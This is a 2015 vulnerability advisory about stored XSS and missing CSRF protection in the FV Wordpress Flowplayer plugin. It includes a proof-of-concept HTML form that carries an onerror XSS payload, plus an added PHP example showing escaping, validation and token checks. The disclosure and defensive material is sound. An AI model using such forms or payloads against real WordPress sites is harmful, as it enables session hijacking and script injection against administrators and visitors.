Subject: Persistent Cross-Site Scripting (XSS) in FV Wordpress Flowplayer 6.0.3.3
Date: Mon, 24 Aug 2015 14:55:15 +0200

Hello,

Plugin: FV Wordpress Flowplayer 6.0.3.3 https://wordpress.org/plugins/fv-wordpress-flowplayer/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store HTML/JS code in plugin configuration values (there is no CSRF protection!).

Method: GET
URL: http://localhost/wp-admin/options-general.php?page=fvplayer
Vulnerable parameters: key, width, height, googleanalytics, splash, rtmp, etc.

Example PHP callstack:
fv_flowplayer_admin_default_options   [/tmp/wpplugin/fv-wordpress-flowplayer/view/admin.php:247]

Verification (store arbitrary key configuration value):
--
<form method="POST" action="http://localhost/wp-admin/options-general.php?page=fvplayer" />
<input type="text" name="fv-wp-flowplayer-submit" value="1" />
<input type="text" name="key" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,
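
Added example (not part of the original advisory and not the plugin's code): a standalone PHP illustration of the three defences this report implies for a settings page, namely escaping stored values on output, validating them on save, and requiring an anti-CSRF token. The function names, the field list, the key alphabet and the "_token" field are assumptions; the WordPress functions named in the comments are the usual equivalents.

```php
<?php
// Added example, not the plugin's code. Function names, field list and the
// "_token" field are illustrative assumptions.

// Vulnerable pattern: a stored option echoed into an attribute as-is.
function render_field_unsafe(string $name, array $opts): string {
    return '<input type="text" name="' . $name . '" value="' . $opts[$name] . '" />';
}

// Output fix: escape for the HTML attribute context (WordPress: esc_attr()).
function render_field_safe(string $name, array $opts): string {
    $v = htmlspecialchars((string)($opts[$name] ?? ''), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $v . '" />';
}

// Input fix: validate each field by type before it is saved.
function sanitize_options(array $in): array {
    return [
        // Assumed key alphabet; adjust to the real licence key format.
        'key'    => preg_replace('/[^A-Za-z0-9$_-]/', '', (string)($in['key'] ?? '')),
        'width'  => max(0, (int)($in['width'] ?? 0)),
        'height' => max(0, (int)($in['height'] ?? 0)),
    ];
}

// CSRF fix: accept a save only when it carries the session's token
// (WordPress: wp_nonce_field() in the form, check_admin_referer() on save).
function csrf_ok(string $sessionToken, $submitted): bool {
    return is_string($submitted) && hash_equals($sessionToken, $submitted);
}

// Constructed sample input: the POST body sent by the advisory's form.
$post  = ['fv-wp-flowplayer-submit' => '1', 'key' => '"><img src=x onerror=alert(1) />'];
$token = bin2hex(random_bytes(16)); // would be kept in the admin's session

// Unescaped: the quote closes value="" early and the <img> tag becomes markup.
echo render_field_unsafe('key', $post), PHP_EOL;
// Escaped: the same bytes stay inside the attribute as text.
echo render_field_safe('key', $post), PHP_EOL;
// Validated on save, then escaped on output (both layers).
echo render_field_safe('key', sanitize_options($post)), PHP_EOL;
// Cross-site form as in the advisory: no token, so the save is refused.
var_dump(csrf_ok($token, $post['_token'] ?? null));
// Form rendered by the admin page itself carries the token.
var_dump(csrf_ok($token, ($post + ['_token' => $token])['_token']));
```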